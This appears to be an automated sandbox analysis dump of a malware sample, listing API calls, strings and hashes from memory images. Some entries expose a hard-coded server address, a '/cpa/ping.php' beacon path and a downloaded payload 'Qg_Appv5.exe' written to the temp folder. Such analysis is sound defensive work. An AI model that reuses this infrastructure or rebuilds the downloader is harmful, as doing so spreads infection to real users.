• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05BBED94,00000000,00000000,?,05BC7461,05BBED94,00000000,00000000,00000000,?,05BC7719,00000006,0042E2F8), ref: 05BC74EC
• GetLastError.KERNEL32(?,05BC7461,05BBED94,00000000,00000000,00000000,?,05BC7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,05BC7052), ref: 05BC74F8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05BC7461,05BBED94,00000000,00000000,00000000,?,05BC7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 05BC7506
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
• Instruction ID: e749e6ede7422d030fe99b6efb11d0062d895a9c4f16aa4056a04a85dbae9126
• Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
• Instruction Fuzzy Hash: E301D8327566265BC7318B68AC44E567F99FF0566175145BCF906D3181DF20E4018ADC
Uniqueness
Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 004129CD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
• Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
• Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
• Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
• GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: "A
• API String ID: 546120528-1838006985
• Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
• Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
• Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
• Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 05BD65C0
  • Part of subcall function 05BB4073: __EH_prolog.LIBCMT ref: 05BB4078
  • Part of subcall function 05BB4073: std::locale::_Init.LIBCPMT ref: 05BB409A
• _Deallocate.LIBCONCRT ref: 05BD6714
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: H_prolog$DeallocateInitstd::locale::_
• String ID: hzB
• API String ID: 2389838984-4102550090
• Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
• Instruction ID: 5fd5c13b9f091a04797739cfdbb9c98c091ca2776678ba22d5646f2c746456ff
• Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
• Instruction Fuzzy Hash: A651BD71A01248DFEB04DFA9C8949EDFBB5FF48300F64426EE406A7281D7B1AA45CF50
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: Info
• String ID: $^A
• API String ID: 1807457897-1499568600
• Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
• Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
• Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
• Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 05BBCA4A
• __IsNonwritableInCurrentImage.LIBCMT ref: 05BBCB03
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 3480331319-1018135373
• Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
• Instruction ID: f29af19f78bdcb3fb31678597ce27bfd89c6a3c34b52b539268ab693ff9d6940
• Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
• Instruction Fuzzy Hash: 3141A270A0020A9BEF10DF28C844AFE7FB5FF45314F1480A6E915AB295D7F5AD05CB90
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,05BD0384,?,00000050,?,?,?,?,?), ref: 05BD0204
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: 62f6d092a35866b61dff8e9f45f7e47235634dd6734710cc7be0f1cad3082e61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63218E62A45209A6E724AB548D09BA7F2ABFF84A51F6684F4F90AD7100F732F9418274
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB33E1
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 05BB3428
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: __EH_prolog3.LIBCMT ref: 05BB7FE1
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::_Lockit.LIBCPMT ref: 05BB7FEC
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::locale::_Setgloballocale.LIBCPMT ref: 05BB8007
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: _Yarn.LIBCPMT ref: 05BB801D
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB805D
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: __EH_prolog.LIBCMT ref: 05BB3656
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::_Lockit.LIBCPMT ref: 05BB3665
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: int.LIBCPMT ref: 05BB367C
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::locale::_Getfacet.LIBCPMT ref: 05BB3685
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB36CC
                                                                                                                                                                                                                                    • Part of subcall function 05BB1AE6: __CxxThrowException@8.LIBVCRUNTIME ref: 05BB1B30
                                                                                                                                                                                                                                    • Part of subcall function 05BB1AE6: std::system_error::system_error.LIBCPMT ref: 05BB1B3F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Exception@8GetfacetH_prolog3InitSetgloballocaleThrowYarnstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: =wB
                                                                                                                                                                                                                                  • API String ID: 372095707-727605340
                                                                                                                                                                                                                                  • Opcode ID: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                  • Instruction ID: 2d279dcf16d24697fe27fde5ad404fd5c0ba339f6f24e3b825a7843aaa6ab342
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A42128B1A00B06AFD714DF69C199AA9FBF0FB08314F50866ED01997A80D7B4F964CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB4078
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 05BB409A
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: __EH_prolog3.LIBCMT ref: 05BB7FE1
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::_Lockit.LIBCPMT ref: 05BB7FEC
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::locale::_Setgloballocale.LIBCPMT ref: 05BB8007
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: _Yarn.LIBCPMT ref: 05BB801D
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB805D
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: __EH_prolog.LIBCMT ref: 05BB43F5
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: std::_Lockit::_Lockit.LIBCPMT ref: 05BB4404
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: int.LIBCPMT ref: 05BB441B
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: std::locale::_Getfacet.LIBCPMT ref: 05BB4424
                                                                                                                                                                                                                                    • Part of subcall function 05BB43F0: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB446B
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: __EH_prolog.LIBCMT ref: 05BB3656
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::_Lockit.LIBCPMT ref: 05BB3665
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: int.LIBCPMT ref: 05BB367C
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::locale::_Getfacet.LIBCPMT ref: 05BB3685
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB36CC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Getfacet$H_prolog3InitSetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID: wB
                                                                                                                                                                                                                                  • API String ID: 3898505750-480074513
                                                                                                                                                                                                                                  • Opcode ID: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                  • Instruction ID: 55622352972462707c32e80e53cc1cdf5a0b6eb10d1cc290a2438f2ccfd938a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70217F71A052049FEB18DF68D845BF9B7B5FF49310F20419ED8059B282DBF4A905CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID: -@
• API String ID: 2279764990-2564449678
• Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
• Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
• Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
• Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: H_prolog
• String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
• API String ID: 3519838083-2876206925
• Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
• Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
• API String ID: 3519838083-2876206925
• Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction ID: 826ceb5a471e9bed9e5992a8d79c84724bd742a9a7b46f8b5e63ea9a07761ce1
• Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction Fuzzy Hash: 8D11CE72A00114BBEB059F89CC44BFEB7B9FF48610F504569F808E7240D3F0BA508BA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00402FEA
• std::locale::_Init.LIBCPMT ref: 0040300E
  • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
  • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
  • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
  • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
  • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
• String ID: T*@
• API String ID: 4198646248-2370032326
• Opcode ID: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
• Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
• Opcode Fuzzy Hash: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
• Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00404373
  • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
• __Getcoll.LIBCPMT ref: 004043CF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: H_prolog$Getcoll
• String ID: u@@
• API String ID: 206117190-736001340
• Opcode ID: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
• Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
• Opcode Fuzzy Hash: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
• Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: [vB$ios_base::failbit set
• API String ID: 3519838083-2429468811
• Opcode ID: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
• Instruction ID: d4e334683dff1b4155850ad540add33a1ab0e65ee55f717f368dd604af9b0a05
• Opcode Fuzzy Hash: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
• Instruction Fuzzy Hash: 6E01BC72A001099FEB04EF98C494BFDFBB8EF49364F14809AE401A7250D7F56A45CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: PathTemp
• String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
• API String ID: 2920410445-1161945460
• Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
• Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
• Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
• Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,05BD5DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05BD658B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: 4d0de2a029d56b9d225091c11390b85c83fe7d51e0c5da211efa26a66e7ceb72
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDE02C022048020A5F294E2A3829ABBDF03EFC6A5434882EBE8824B249CD412C4BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
• Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
• Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
• Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05BCAAFA
• GetLastError.KERNEL32 ref: 05BCAB08
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05BCAB63
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
• Instruction ID: 368f85d501a1beafafa22f9d5ac33099ada42be5ded147513b812145bea3d1b8
• Opcode Fuzzy Hash: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
• Instruction Fuzzy Hash: 1F41C63060424AAFDB25DF64C848EBABFA7FF01714F1541EDE999AB1A0DB30A901C758
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

